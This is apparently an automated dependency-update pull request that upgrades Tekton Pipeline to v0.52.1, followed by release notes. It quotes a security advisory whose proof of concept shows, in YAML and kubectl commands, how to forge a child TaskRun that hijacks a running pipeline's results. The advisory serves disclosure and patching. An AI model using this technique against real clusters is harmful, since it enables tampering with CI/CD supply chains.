chore(deps): update module github.com/tektoncd/pipeline to v0.52.1 [security] (release-v0.13)

[redhat-renovate-bot]

This PR contains the following updates:

Package	Type	Update	Change
github.com/tektoncd/pipeline	require	minor	v0.40.2 -> v0.52.1

---

Pipelines do not validate child UIDs

CVE-2023-37264 / GHSA-w2h3-vvvq-3m53 / GO-2023-1901

More information

Details

Summary

Pipelines do not validate child UIDs, which means that a user that has access to create TaskRuns can create their own Tasks that the Pipelines controller will accept as the child Task.

We should add UID to PipelineRun status and validate that child Run status/results only come from Runs matching the same UID.

Details

While we store and validate the PipelineRun's (api version, kind, name, uid) in the child Run's OwnerReference, we only store (api version, kind, name) in the ChildStatusReference .

This means that if a client had access to create TaskRuns on a cluster, they could create a child TaskRun for a pipeline with the same name + owner reference, and the Pipeline controller picks it up as if it was the original TaskRun. This is problematic since it can let users modify the config of Pipelines at runtime, which violates SLSA L2 Service Generated / Non-falsifiable requirements.

I believe this is also true for TaskRuns -> Pods since it looks like we only lookup by name, though I haven't tested this.

If you have update permissions on tekton resources, you could also perform a similar bypass like this (because it's difficult to distinguish this from a Task retry). For now, I think relying on RBAC is fine and treat update as a privileged role (though we should perhaps update docs to stress this). Create is the most problematic for now. SPIFFE/SPIRE might be able to help with ensuring that only the controller can modify state long term (e.g. sign the expected UIDs?)

PoC

apiVersion: [tekton.dev/v1beta1](http://tekton.dev/v1beta1)
kind: PipelineRun
metadata:
  name: hello-pr
spec:
  pipelineSpec:
    tasks:
      - name: task1
        taskSpec:
          steps:
            - name: echo
              image: [distroless.dev/alpine-base](http://distroless.dev/alpine-base)
              script: |
                sleep 60
      - name: task2
        runAfter: [task1]
        taskSpec:
          steps:
            - name: echo
              image: [distroless.dev/alpine-base](http://distroless.dev/alpine-base)
              script: |
                echo "asdf" > $(results.foo.path)
          results:
            - name: foo
    results:
      - name: foo
        value: $(tasks.task2.results.foo)

Once this is running, grab the PR UID:

$ k get pr hello-pr -o json | jq .metadata.uid -r

While pipeline is running task 1, start fake task 2:

apiVersion: [tekton.dev/v1beta1](http://tekton.dev/v1beta1)
kind: TaskRun
metadata:
  annotations:
  labels:
    [app.kubernetes.io/managed-by](http://app.kubernetes.io/managed-by): tekton-pipelines
    [tekton.dev/memberOf](http://tekton.dev/memberOf): tasks
    [tekton.dev/pipeline](http://tekton.dev/pipeline): hello-pr
    [tekton.dev/pipelineRun](http://tekton.dev/pipelineRun): hello-pr
    [tekton.dev/pipelineTask](http://tekton.dev/pipelineTask): task2
  name: hello-pr-task2
  namespace: default
  ownerReferences:
  - apiVersion: [tekton.dev/v1beta1](http://tekton.dev/v1beta1)
    blockOwnerDeletion: true
    controller: true
    kind: PipelineRun
    name: hello-pr
    uid: af549647-4532-468b-90c5-29122a408f8d <--- this should be UID of PR fetched in last step
spec:
  serviceAccountName: default
  taskSpec:
    results:
    - name: foo
      type: string
    steps:
    - image: [distroless.dev/alpine-base](http://distroless.dev/alpine-base)
      name: echo
      resources: {}
      script: |
        echo "zxcv" > $(results.foo.path)

Get pipeline results - it shows the output of the 2nd injected TaskRun

$ k get pr -o json hello-pr | jq .status.pipelineResults
[
  {
    "name": "foo",
    "value": "zxcv\n"
  }
]

Impact

This can be used to trick the Pipeline controller into associating unrelated Runs to the Pipeline, feeding its data through the rest of the Pipeline. This requires access to create TaskRuns, so impact may vary depending on your Tekton setup. If users already have unrestricted access to create any Task/PipelineRun, this does not grant any additional capabilities.

Worst case example would be a supply chain attack where a malicious TaskRun triggered from Triggers/Workflows intercepts and replaces a task in a trusted Pipeline.

Severity

• CVSS Score: 3.7 / 10 (Low)
• Vector String: CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:N

References

• https://github.com/tektoncd/pipeline/security/advisories/GHSA-w2h3-vvvq-3m53
• https://nvd.nist.gov/vuln/detail/CVE-2023-37264
• https://github.com/tektoncd/pipeline
• https://github.com/tektoncd/pipeline/blob/2d38f5fa840291395178422d34b36b1bc739e2a2/pkg/reconciler/pipelinerun/pipelinerun.go#L1358-L1372
• https://pkg.go.dev/github.com/tektoncd/pipeline/pkg/apis/pipeline/v1beta1#ChildStatusReference

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).

---

Release Notes

tektoncd/pipeline (github.com/tektoncd/pipeline)

v0.52.1: Tekton Pipeline release v0.52.1 "California Spangled Optimus"

Compare Source

-Docs @​ v0.52.1
-Examples @​ v0.52.1

Installation one-liner

kubectl apply -f https://storage.googleapis.com/tekton-releases/pipeline/previous/v0.52.1/release.yaml

Attestation

The Rekor UUID for this release is 24296fb24b8ad77a97c22594268cc45d986246339ada304b7587b205b59cf5d59df2650d24b14825

Obtain the attestation:

REKOR_UUID=24296fb24b8ad77a97c22594268cc45d986246339ada304b7587b205b59cf5d59df2650d24b14825
rekor-cli get --uuid $REKOR_UUID --format json | jq -r .Attestation | jq .

Verify that all container images in the attestation are in the release file:

RELEASE_FILE=https://storage.googleapis.com/tekton-releases/pipeline/previous/v0.52.1/release.yaml
REKOR_UUID=24296fb24b8ad77a97c22594268cc45d986246339ada304b7587b205b59cf5d59df2650d24b14825

### Obtains the list of images with sha from the attestation
REKOR_ATTESTATION_IMAGES=$(rekor-cli get --uuid "$REKOR_UUID" --format json | jq -r .Attestation | jq -r '.subject[]|.name + ":v0.52.1@​sha256:" + .digest.sha256')

### Download the release file
curl "$RELEASE_FILE" > release.yaml

### For each image in the attestation, match it to the release file
for image in $REKOR_ATTESTATION_IMAGES; do
  printf $image; grep -q $image release.yaml && echo " ===> ok" || echo " ===> no match";
done

Changes

Fixes

• 🐛 [release-v0.52.x] Regression: fix results with out of order tasks (#​7174)

Fix regression where a different order of task definition may cause result resolution to break

Thanks

Thanks to these contributors who contributed to v0.52.1!

• ❤️ @​afrittoli
• ❤️ @​tekton-robot

Extra shout-out for awesome release notes:

• 😍 @​afrittoli
• 😍 @​tekton-robot

v0.52.0: Tekton Pipeline release v0.52.0 "California Spangled Optimus"

Compare Source

🎉 Task and Pipeline Resolver Metrics, API Specifications for pipelines-in-pipelines 🎉

-Docs @​ v0.52.0
-Examples @​ v0.52.0

Installation one-liner

kubectl apply -f https://storage.googleapis.com/tekton-releases/pipeline/previous/v0.52.0/release.yaml

Attestation

The Rekor UUID for this release is 24296fb24b8ad77aede6ff3c84da87cdeda75e9dcf779abc736bf5423b8a4151bad8193f0c76dd15

Obtain the attestation:

REKOR_UUID=24296fb24b8ad77aede6ff3c84da87cdeda75e9dcf779abc736bf5423b8a4151bad8193f0c76dd15
rekor-cli get --uuid $REKOR_UUID --format json | jq -r .Attestation | jq .

Verify that all container images in the attestation are in the release file:

RELEASE_FILE=https://storage.googleapis.com/tekton-releases/pipeline/previous/v0.52.0/release.yaml
REKOR_UUID=24296fb24b8ad77aede6ff3c84da87cdeda75e9dcf779abc736bf5423b8a4151bad8193f0c76dd15

### Obtains the list of images with sha from the attestation
REKOR_ATTESTATION_IMAGES=$(rekor-cli get --uuid "$REKOR_UUID" --format json | jq -r .Attestation | jq -r '.subject[]|.name + ":v0.52.0@​sha256:" + .digest.sha256')

### Download the release file
curl "$RELEASE_FILE" > release.yaml

### For each image in the attestation, match it to the release file
for image in $REKOR_ATTESTATION_IMAGES; do
  printf $image; grep -q $image release.yaml && echo " ===> ok" || echo " ===> no match";
done

Changes

Features

• ✨ Add taskrun/pipelinerun gauge metrics around resolving respective tasks/pipelines (#​7094)

New gauge metrics are introduced that count the number of TaskRuns waiting for resolution of any Tasks they reference, as well as count the number of PipelineRuns waiting on Pipeline resolution, and lastly count the number of PipelineRuns waiting on Task resolution for their underlying TaskRuns.

• ✨ [TEP-0056]: Initial set of API refactors pertinent to Pipelines in Pipelines (#​7055)

Added PipelineRef and PipelineSpec fields to PipelineTask, in lieu of TEP-0056

Fixes

• 🐛 fix: clean results when taskrun retries (#​7126)

The taskrun will clean up the last task results before retrying.

• 🐛 Validate beta features for inline pipelines and tasks (#​7079)

Bug fix: validate beta features in inline tasks/pipelines in the same way as referenced tasks/pipelines

• 🐛 Remove results annotations filtering (#​7108)
• 🐛 fix an issue with InvalidMatrixParameterTypes along with updating the matrix example with additional validations (#​7064)

Misc

• 🔨 Add configmap for tracing config (#​6897)

Tracing endpoint configuration is now moved from environment variable to the configmap config-tracing. Tracing can be now configured dynamically without needing to restart the controller. Refer the example configuration provided as part of the ConfigMap for the configuration options and format.

• 🔨 Clean up getting substitution expressions (#​7121)
• 🔨 DEVELOPMENT: missing newline escape on shell example (#​7107)
• 🔨 Cleanup: Move PipelineRun Reasons to pkg/apis (#​7102)
• 🔨 cleaning up provenance from pipelineRun (#​7091)
• 🔨 eventForObjectWithCondition -> EventForObjectWithCondition (#​7052)
• 🔨 remove GetUnsignedPipeline helper function and use var in each file (#​6800)
• 🔨 Bump github.com/containerd/containerd from 1.7.3 to 1.7.6 (#​7130)
• 🔨 Bump github.com/spiffe/spire-api-sdk from 1.7.1 to 1.7.2 (#​7129)
• 🔨 Bump k8s.io/apimachinery from 0.27.1 to 0.27.6 in /test/custom-task-ctrls/wait-task-beta (#​7119)
• 🔨 Bump k8s.io/client-go from 0.27.1 to 0.27.6 in /test/custom-task-ctrls/wait-task-beta (#​7118)
• 🔨 Bump k8s.io/api from 0.27.1 to 0.27.6 in /test/custom-task-ctrls/wait-task-beta (#​7117)
• 🔨 Bump k8s.io/api from 0.26.7 to 0.26.9 in /test/custom-task-ctrls/wait-task-beta (#​7114)
• 🔨 Bump k8s.io/client-go from 0.25.11 to 0.25.14 in /test/custom-task-ctrls/wait-task-beta (#​7112)
• 🔨 Bump google.golang.org/grpc from 1.56.2 to 1.58.1 (#​7111)
• 🔨 Bump github.com/jenkins-x/go-scm from 1.13.13 to 1.14.14 (#​7089)
• 🔨 Bump github.com/sigstore/sigstore from 1.7.1 to 1.7.3 (#​7087)
• 🔨 Bump github.com/tektoncd/pipeline from 0.49.0 to 0.51.0 in /test/custom-task-ctrls/wait-task-beta (#​7061)
• 🔨 Bump google.golang.org/protobuf from 1.30.0 to 1.31.0 (#​6913)

Docs

• 📖 add docs for emitting object results (#​7120)
• 📖 fix docs and add max-result-size optional feature flag (#​7110)
• 📖 Fix the link to alpha-features in docs (#​7075)

Thanks

Thanks to these contributors who contributed to v0.52.0!

• ❤️ @​Yongxuanzhang
• ❤️ @​bhujangr
• ❤️ @​cugykw
• ❤️ @​dependabot[bot]
• ❤️ @​gabemontero
• ❤️ @​jerop
• ❤️ @​khrm
• ❤️ @​kmjayadeep
• ❤️ @​lbernick
• ❤️ @​lvnvn
• ❤️ @​melnikalex
• ❤️ @​pritidesai
• ❤️ @​vbatts

Extra shout-out for awesome release notes:

• 😍 @​bhujangr
• 😍 @​cugykw
• 😍 @​gabemontero
• 😍 @​kmjayadeep
• 😍 @​lbernick

v0.51.0: Tekton Pipeline release v0.51.0 "Havana Brown Demerzel"

Compare Source

🎉 Co-schedule option and bugfixes 🎉

-Docs @​ v0.51.0
-Examples @​ v0.51.0

Installation one-liner

kubectl apply -f https://storage.googleapis.com/tekton-releases/pipeline/previous/v0.51.0/release.yaml

Attestation

The Rekor UUID for this release is 24296fb24b8ad77af0123195ea84840480151ea9735ca9e2f869d262e403dad6fa6c42c32bc04193

Obtain the attestation:

REKOR_UUID=24296fb24b8ad77af0123195ea84840480151ea9735ca9e2f869d262e403dad6fa6c42c32bc04193
rekor-cli get --uuid $REKOR_UUID --format json | jq -r .Attestation | jq .

Verify that all container images in the attestation are in the release file:

RELEASE_FILE=https://storage.googleapis.com/tekton-releases/pipeline/previous/v0.51.0/release.yaml
REKOR_UUID=24296fb24b8ad77af0123195ea84840480151ea9735ca9e2f869d262e403dad6fa6c42c32bc04193

### Obtains the list of images with sha from the attestation
REKOR_ATTESTATION_IMAGES=$(rekor-cli get --uuid "$REKOR_UUID" --format json | jq -r .Attestation | jq -r '.subject[]|.name + ":v0.51.0@​sha256:" + .digest.sha256')

### Download the release file
curl "$RELEASE_FILE" > release.yaml

### For each image in the attestation, match it to the release file
for image in $REKOR_ATTESTATION_IMAGES; do
  printf $image; grep -q $image release.yaml && echo " ===> ok" || echo " ===> no match";
done

Upgrade Notices

With this release, the minimun Kubernetes version supported is now 1.25.

Changes

Features

• ✨ [TEP-0135] Coschedule per (Isolated) PipelineRun e2e support (#​6927)

[TEP-0135]: Support coschedule: pipelineruns and coschedule: isolate-pipelinerun coschedule modes.
Users can now opt in this new feature to schedule all the pods in the same node and to optionally enforce one running pipelinerun in a node at the same time.

• ✨ Add service for Resolvers - metrics, probes and tracing (#​6973)

Deprecation Notices

• 🚨 Mark disable-affinity-assistant as deprecated (#​6991)

The disable-affinity-assistant feature flag is deprecated in favour of the new coschedule feature flag. The disable-affinity-assistant feature flag will be removed in 9 months.

Fixes

• 🐛 Fix release pipeline (publish-to-bucket) (#​7044)

Binary file (standard input) matches

• 🐛 Make sure we use the correct namespace for remote Pipeline validation (#​7017)

ix validation errors when using the cluster resolver

• 🐛 Create a separate role for Events Controller (#​7016)

The role for Events Controller is now tekton-events-controller, and the Rolebinding is now tekton-pipelines-events-controller.

• 🐛 fix: add taskRunTemplate field validation (#​6983)

Validate forbidden envs in TaskRunTemplate.PodTemplate.

• 🐛 Fail fast on invalid image (#​6982)

The Pod reason InvalidImageName is treated now as a permanent issue, so that TaskRuns that include a step with an invalid image reference are failed immediately and the corresponding Pod is deleted.

• 🐛 Sync checksum between trusted resources and cluster resolver (#​6964)

Cluster resolver now computes the checksum of the pre-processed Tekton object instead of just the spec.

• 🐛 Fix Taskrun Failure for Preempted Pod of Taskrun (#​6962)

This fixes the Taskrun failure for Preempted Pod of Taskrun which uses PVC.

• 🐛 fix: refine error resean with invalid pipelinename in taskrunspecs (#​6957)

When the taskRunSpecs of the pipelineRun contains an invalid pipeline task name, the cause of the InvalidTaskRunSpecs error is displayed.

• 🐛 Fix enforce-nonfalsifiability feature flag in configmap (#​6937)

Misc

• 🔨 Mark disable-affinity-assistant as deprecated (#​6991)

action required: The disable-affinity-assistant feature flag is deprecated in favour of the new coschedule feature flag. The disable-affinity-assistant feature flag will be removed in 9 months.
The Affinity Assistant behaviour should now be configured by the coschedule feature flag.

• 🔨 Bump knative/pkg to 1.11 (#​6975)

Bump knative.dev/pkg to 1.11 so the Kubernetes min version is now 1.25

• 🔨 Add webhook validation for remote Tasks (#​6942)

Remote tasks are now validated by any validating admission webhooks.

• 🔨 [TEP-0135] Refactor CreatePVCsForWorkspaces (#​6921)
• 🔨 Bump github.com/golangci/golangci-lint from 1.54.1 to 1.54.2 in /tools (#​7057)
• 🔨 Bump github.com/golangci/golangci-lint from 1.54.0 to 1.54.1 in /tools (#​7047)
• 🔨 Bump github.com/golangci/golangci-lint from 1.53.3 to 1.54.0 in /tools (#​7039)
• 🔨 Bump github.com/hashicorp/golang-lru from 0.5.4 to 1.0.2 (#​7031)
• 🔨 Bump github.com/cloudflare/circl from 1.1.0 to 1.3.3 (#​7026)
• 🔨 Bump github.com/google/go-containerregistry from 0.15.2 to 0.16.1 (#​7021)
• 🔨 Bump go.uber.org/zap from 1.24.0 to 1.25.0 (#​7018)
• 🔨 Bump github.com/containerd/containerd from 1.6.19 to 1.7.3 (#​7002)
• 🔨 Bump github.com/spiffe/spire-api-sdk from 1.7.0 to 1.7.1 (#​6997)
• 🔨 Bump github.com/go-git/go-git/v5 from 5.6.1 to 5.8.1 (#​6980)
• 🔨 Add E2E Testing for Matrix (#​6944)

Docs

• 📖 docs: Update references to examples from v1beta1 to v1 (#​7050)
• 📖 Fix typos and formatting in TaskRuns doc (#​7020)
• 📖 Update Matrix Documentation for Results (#​7012)
• 📖 [TEP-0135] Improve workspace related documentation (#​6994)
• 📖 Remove warnings about matrix being non-functional (#​6986)
• 📖 Add v0.50 to releases.md (#​6967)
• 📖 [TEP-0135] Update Affinity Assistant documentation (#​6892)

Thanks

Thanks to these contributors who contributed to v0.51.0!

• ❤️ @​AlanGreene
• ❤️ @​EmmaMunley
• ❤️ @​HamzaMateen
• ❤️ @​QuanZhang-William
• ❤️ @​afrittoli
• ❤️ @​chitrangpatel
• ❤️ @​cugykw
• ❤️ @​dependabot[bot]
• ❤️ @​khrm
• ❤️ @​lbernick
• ❤️ @​vdemeester

Extra shout-out for awesome release notes:

• 😍 @​QuanZhang-William
• 😍 @​afrittoli
• 😍 @​chitrangpatel
• 😍 @​cugykw
• 😍 @​khrm
• 😍 @​lbernick
• 😍 @​vdemeester

v0.50.6: Tekton Pipeline release v0.50.6 "Russian Blue Daneel Olivaw"

Compare Source

-Docs @​ v0.50.6
-Examples @​ v0.50.6

Installation one-liner

kubectl apply -f https://storage.googleapis.com/tekton-releases/pipeline/previous/v0.50.6/release.yaml

Attestation

The Rekor UUID for this release is 24296fb24b8ad77ab39f94a9c6627f1ae85c428863d0dbdbea4c9481976f30c00d5f9f712a117720

Obtain the attestation:

REKOR_UUID=24296fb24b8ad77ab39f94a9c6627f1ae85c428863d0dbdbea4c9481976f30c00d5f9f712a117720
rekor-cli get --uuid $REKOR_UUID --format json | jq -r .Attestation | jq .

Verify that all container images in the attestation are in the release file:

RELEASE_FILE=https://storage.googleapis.com/tekton-releases/pipeline/previous/v0.50.6/release.yaml
REKOR_UUID=24296fb24b8ad77ab39f94a9c6627f1ae85c428863d0dbdbea4c9481976f30c00d5f9f712a117720

### Obtains the list of images with sha from the attestation
REKOR_ATTESTATION_IMAGES=$(rekor-cli get --uuid "$REKOR_UUID" --format json | jq -r .Attestation | jq -r '.subject[]|.name + ":v0.50.6@​sha256:" + .digest.sha256')

### Download the release file
curl "$RELEASE_FILE" > release.yaml

### For each image in the attestation, match it to the release file
for image in $REKOR_ATTESTATION_IMAGES; do
  printf $image; grep -q $image release.yaml && echo " ===> ok" || echo " ===> no match";
done

Changes

Features

Fixes

• 🐛 [release-v0.50.x] Remove conversion configuration for (#​7798)

emove conversion webhook configuration from the ClusterTask CRD, it doesn't need it.

• 🐛 [release-v0.50.x] fix: ensure clustertask annotations are synced to taskrun (#​7656)

ix: ensure ClusterTask annotations and labels are synced to TaskRun

• 🐛 [release-v0.50.x] Fix validations for Sidecars to be consistent (#​7451)

idecars are now validated at admission webhook

• 🐛 [release-v0.50.x] don't return validation error when final tasks failed/skipped (#​7485)

• [release-v0.50.x] chore(deps): Migrate to github.com/go-jose/go-jose/v3 (#​7858)
• [release-v0.50.x] Update go-git/v5 for CVE-2023-49569 (#​7839)

Misc

Docs

Thanks

Thanks to these contributors who contributed to v0.50.6!

• ❤️ @​tekton-robot
• ❤️ @​vdemeester

Extra shout-out for awesome release notes:

• 😍 @​tekton-robot
• 😍 @​vdemeester

v0.50.5: Tekton Pipeline release v0.50.5 "Russian Blue Daneel Olivaw"

Compare Source

-Docs @​ v0.50.5
-Examples @​ v0.50.5

Installation one-liner

kubectl apply -f https://storage.googleapis.com/tekton-releases/pipeline/previous/v0.50.5/release.yaml

Attestation

The Rekor UUID for this release is 24296fb24b8ad77a6931938578b4916b2944efdb45cd531e1913f85b8bc9c0a4e73512edcfbb86b5

Obtain the attestation:

REKOR_UUID=24296fb24b8ad77a6931938578b4916b2944efdb45cd531e1913f85b8bc9c0a4e73512edcfbb86b5
rekor-cli get --uuid $REKOR_UUID --format json | jq -r .Attestation | jq .

Verify that all container images in the attestation are in the release file:

RELEASE_FILE=https://storage.googleapis.com/tekton-releases/pipeline/previous/v0.50.5/release.yaml
REKOR_UUID=24296fb24b8ad77a6931938578b4916b2944efdb45cd531e1913f85b8bc9c0a4e73512edcfbb86b5

### Obtains the list of images with sha from the attestation
REKOR_ATTESTATION_IMAGES=$(rekor-cli get --uuid "$REKOR_UUID" --format json | jq -r .Attestation | jq -r '.subject[]|.name + ":v0.50.5@​sha256:" + .digest.sha256')

### Download the release file
curl "$RELEASE_FILE" > release.yaml

### For each image in the attestation, match it to the release file
for image in $REKOR_ATTESTATION_IMAGES; do
  printf $image; grep -q $image release.yaml && echo " ===> ok" || echo " ===> no match";
done

Changes

Misc

• 🔨 [release-v0.50.x] Fix the controller and webhook images to use stable alpine (#​7370)

The Tekton controller images are now based on a distroless base image which is built on top of Alpine 3.18

Thanks

Thanks to these contributors who contributed to v0.50.5!

• ❤️ @​afrittoli

Extra shout-out for awesome release notes:

• 😍 @​afrittoli

v0.50.4: Tekton Pipeline release v0.50.4 "Russian Blue Daneel Olivaw"

Compare Source

-Docs @​ v0.50.4
-Examples @​ v0.50.4

Installation one-liner

kubectl apply -f https://storage.googleapis.com/tekton-releases/pipeline/previous/v0.50.4/release.yaml

Attestation

The Rekor UUID for this release is 24296fb24b8ad77a71dafca6c5f27aec2842996255eeda41ddd2b1cec5ca920da82d7239d7007e7a

Obtain the attestation:

REKOR_UUID=24296fb24b8ad77a71dafca6c5f27aec2842996255eeda41ddd2b1cec5ca920da82d7239d7007e7a
rekor-cli get --uuid $REKOR_UUID --format json | jq -r .Attestation | jq .

Verify that all container images in the attestation are in the release file:

RELEASE_FILE=https://storage.googleapis.com/tekton-releases/pipeline/previous/v0.50.4/release.yaml
REKOR_UUID=24296fb24b8ad77a71dafca6c5f27aec2842996255eeda41ddd2b1cec5ca920da82d7239d7007e7a

### Obtains the list of images with sha from the attestation
REKOR_ATTESTATION_IMAGES=$(rekor-cli get --uuid "$REKOR_UUID" --format json | jq -r .Attestation | jq -r '.subject[]|.name + ":v0.50.4@​sha256:" + .digest.sha256')

### Download the release file
curl "$RELEASE_FILE" > release.yaml

### For each image in the attestation, match it to the release file
for image in $REKOR_ATTESTATION_IMAGES; do
  printf $image; grep -q $image release.yaml && echo " ===> ok" || echo " ===> no match";
done

Changes

Misc

• 🔨 [release-v0.50.x] Pin the distroless base image to a stable alpine (#​7362)

The Tekton images are now based on a distroless base image which is built on top of Alpine 3.18

Thanks

Thanks to these contributors who contributed to v0.50.4!

• ❤️ @​afrittoli

Extra shout-out for awesome release notes:

• 😍 @​afrittoli

v0.50.3: Tekton Pipeline release v0.50.3 "Rusian Blue Daneel Olivaw"

Compare Source

-Docs @​ v0.50.3
-Examples @​ v0.50.3

Installation one-liner

kubectl apply -f https://storage.googleapis.com/tekton-releases/pipeline/previous/v0.50.3/release.yaml

Attestation

The Rekor UUID for this release is 24296fb24b8ad77a8e347216bc80c82074f1721dbcfb1e10e487a0a2e5925d27cf46898c53bf6f5a

Obtain the attestation:

REKOR_UUID=24296fb24b8ad77a8e347216bc80c82074f1721dbcfb1e10e487a0a2e5925d27cf46898c53bf6f5a
rekor-cli get --uuid $REKOR_UUID --format json | jq -r .Attestation | jq .

Verify that all container images in the attestation are in the release file:

RELEASE_FILE=https://storage.googleapis.com/tekton-releases/pipeline/previous/v0.50.3/release.yaml
REKOR_UUID=24296fb24b8ad77a8e347216bc80c82074f1721dbcfb1e10e487a0a2e5925d27cf46898c53bf6f5a

### Obtains the list of images with sha from the attestation
REKOR_ATTESTATION_IMAGES=$(rekor-cli get --uuid "$REKOR_UUID" --format json | jq -r .Attestation | jq -r '.subject[]|.name + ":v0.50.3@​sha256:" + .digest.sha256')

### Download the release file
curl "$RELEASE_FILE" > release.yaml

### For each image in the attestation, match it to the release file
for image in $REKOR_ATTESTATION_IMAGES; do
  printf $image; grep -q $image release.yaml && echo " ===> ok" || echo " ===> no match";
done

Changes

Features

Fixes

• [v0.50.x] Bump GRPC Go to 1.56.3 to fix CVE (#​7234)

This addresses GHSA-qppj-fm5r-hxr3 by not allowing more server handlers to be run than the HTTP/2 MAX_CONCURRENT_STREAMS setting.

Misc

Docs

Thanks

Thanks to these contributors who contributed to v0.50.3!

• ❤️ @​khrm

Extra shout-out for awesome release notes:

• 😍 @​khrm

v0.50.2: Tekton Pipeline release v0.50.2 "Russian Blue Daneel Olivaw"

Compare Source

-Docs @​ v0.50.2
-Examples @​ v0.50.2

Installation one-liner

kubectl apply -f https://storage.googleapis.com/tekton-releases/pipeline/previous/v0.50.2/release.yaml

Attestation

The Rekor UUID for this release is 24296fb24b8ad77a6726958468f17410d57decea33a20cc1c61cae727201991da57f788c4095926b

Obtain the attestation:

REKOR_UUID=24296fb24b8ad77a6726958468f17410d57decea33a20cc1c61cae727201991da57f788c4095926b
rekor-cli get --uuid $REKOR_UUID --format json | jq -r .Attestation | jq .

Verify that all container images in the attestation are in the release file:

RELEASE_FILE=https://storage.googleapis.com/tekton-releases/pipeline/previous/v0.50.2/release.yaml
REKOR_UUID=24296fb24b8ad77a6726958468f17410d57decea33a20cc1c61cae727201991da57f788c4095926b

### Obtains the list of images with sha from the attestation
REKOR_ATTESTATION_IMAGES=$(rekor-cli get --uuid "$REKOR_UUID" --format json | jq -r .Attestation | jq -r '.subject[]|.name + ":v0.50.2@​sha256:" + .digest.sha256')

### Download the release file
curl "$RELEASE_FILE" > release.yaml

### For each image in the attestation, match it to the release file
for image in $REKOR_ATTESTATION_IMAGES; do
  printf $image; grep -q $image release.yaml && echo " ===> ok" || echo " ===> no match";
done

Changes

Fixes

• 🐛 [release-v0.50.x] Regression: fix results with out of order tasks (#​7173)

Fix regression where a different order of task definition may cause result resolution to break

• 🐛 [release-v0.50.x] Validate beta features for inline pipelines and tasks (#​7080)

Bug fix: validate beta features in inline tasks/pipelines in the same way as referenced tasks/pipelines

• 🐛 [release-v0.50.x] Fix release pipeline (publish-to-bucket) (#​7045)

Fixed the release pipeline invalid spec.

• 🐛 [release-v0.50.x] Remove results annotations filtering (#​7131)

• 🐛 [v0.50.x] Update knative/pkg 1.10 to address CVE-2023-44487 (#​7211)

Misc

• 🔨 Increase the publish timeout (#​7215)

Docs

• 📖 [release-v0.50.x] docs: Update references to examples from v1beta1 to v1 (#​7202)

Thanks

Thanks to these contributors who contributed to v0.50.2!

• ❤️ @​afrittoli
• ❤️ @​khrm
• ❤️ @​tekton-robot

Extra shout-out for awesome release notes:

• 😍 @​tekton-robot

v0.50.1: Tekton Pipeline release v0.50.1 "Russian Blue Daneel Olivaw"

Compare Source

-Docs @​ v0.50.1
-Examples @​ v0.50.1

Installation one-liner

kubectl apply -f https://storage.googleapis.com/tekton-releases/pipeline/previous/v0.50.1/release.yaml

Attestation

The Rekor UUID for this release is 24296fb24b8ad77a1b02a57c8f75368d54f3f986188b3692201557a51808b4bc4e8acc1fcb835e38

Obtain the attestation:

REKOR_UUID=24296fb24b8ad77a1b02a57c8f75368d54f3f986188b3692201557a51808b4bc4e8acc1fcb835e38
rekor-cli get --uuid $REKOR_UUID --format json | jq -r .Attestation | jq .

Verify that all container images in the attestation are in the release file:

RELEASE_FILE=https://storage.googleapis.com/tekton-releases/pipeline/previous/v0.50.1/release.yaml
REKOR_UUID=24296fb24b8ad77a1b02a57c8f75368d54f3f986188b3692201557a51808b4bc4e8acc1fcb835e38

### Obtains the list of images with sha from the attestation
REKOR_ATTESTATION_IMAGES=$(rekor-cli get --uuid "$REKOR_UUID" --format json | jq -r .Attestation | jq -r '.subject[]|.name + ":v0.50.1@​sha256:" + .digest.sha256')

### Download the release file
curl "$RELEASE_FILE" > release.yaml

### For each image in the attestation, match it to the release file
for image in $REKOR_ATTESTATION_IMAGES; do
  printf $image; grep -q $image release.yaml && echo " ===> ok" || echo " ===> no match";
done

Changes

Features

Fixes

• 🐛 [release-v0.50.x] Make sure we use the correct namespace for remote Pipeline validation (#​7023)

ix validation errors when using the cluster resolver

• 🐛 [release-v0.50.x] Fix Taskrun Failure for Preempted Pod of Taskrun (#​7009)

his fixes the Taskrun failure for Preempted Pod of Taskrun which uses PVC.

Misc

Docs

Thanks

Thanks to these contributors who contributed to v0.50.1!

• ❤️ @​tekton-robot

Extra shout-out for awesome release notes:

• 😍 @​tekton-robot

v0.50.0: Tekton Pipeline release v0.50.0 "Russian Blue Daneel Olivaw"

Compare Source

🎉 v1beta1 deprecation (1 year support still) 🎉

-Docs @​ v0.50.0
-Examples @​ v0.50.0

Installation one-liner

kubectl apply -f https://storage.googleapis.com/tekton-releases/pipeline/previous/v0.50.0/release.yaml

Attestation

The Rekor UUID for this release is 24296fb24b8ad77a1665fb7556e457413b181806c513eeea26f12c0bd118bcf14912ee6bbee395d9

Obtain the attestation:

REKOR_UUID=24296fb24b8ad77a1665fb7556e457413b181806c513eeea26f12c0bd118bcf14912ee6bbee395d9
rekor-cli get --uuid $REKOR_UUID --format json | jq -r .Attestation | jq .

Verify that all container images in the attestation are in the release file:

RELEASE_FILE=https://storage.googleapis.com/tekton-releases/pipeline/previous/v0.50.0/release.yaml
REKOR_UUID=24296fb24b8ad77a1665fb7556e457413b181806c513eeea26f12c0bd118bcf14912ee6bbee395d9

### Obtains the list of images with sha from the attestation
REKOR_ATTESTATION_IMAGES=$(rekor-cli get --uuid "$REKOR_UUID" --format json | jq -r .Attestation | jq -r '.subject[]|.name + ":v0.50.0@​sha256:" + .digest.sha256')

### Download the release file
curl "$RELEASE_FILE" > release.yaml

### For each image in the attestation, match it to the release file
for image in $REKOR_ATTESTATION_IMAGES; do
  printf $image; grep -q $image release.yaml && echo " ===> ok" || echo " ===> no match";
done

Changes

Features

• ✨ Update Stability Level for CSI and Projected Volume Workspaces (#​6954)

csi and projected volume workspaces are stable.

• ✨ [TEP-0029] Isolated steps and sidecar workspaces to beta (#​6922)

The "isolated workspaces" feature allows users to share a workspace with dedicated steps and sidecars, instead of the whole TaskRun. The feature has been promoted to "beta".

• ✨ [TEP-0135] Revert PVC creation (#​6893)

TEP-0135: Revert the owner of PVCs created by pipelinerun VolumeClaimTemplate back to pipelinerun. The PVCs bounded to the pipelinerun is now in bounded state when the pipelinerun is completed but not deleted.

• ✨ [TEP-0137] Add events config map (#​6883)

action required: The default-cloud-events-sink setting in the config-defaults config map is deprecated. The CloudEvents sink shall be configured now through the sink settings in the new config-events config map.

• ✨ TEP-0135: Introduce coschedule feature flags (#​6790)

tep-0135: introduce coschedule feature flag

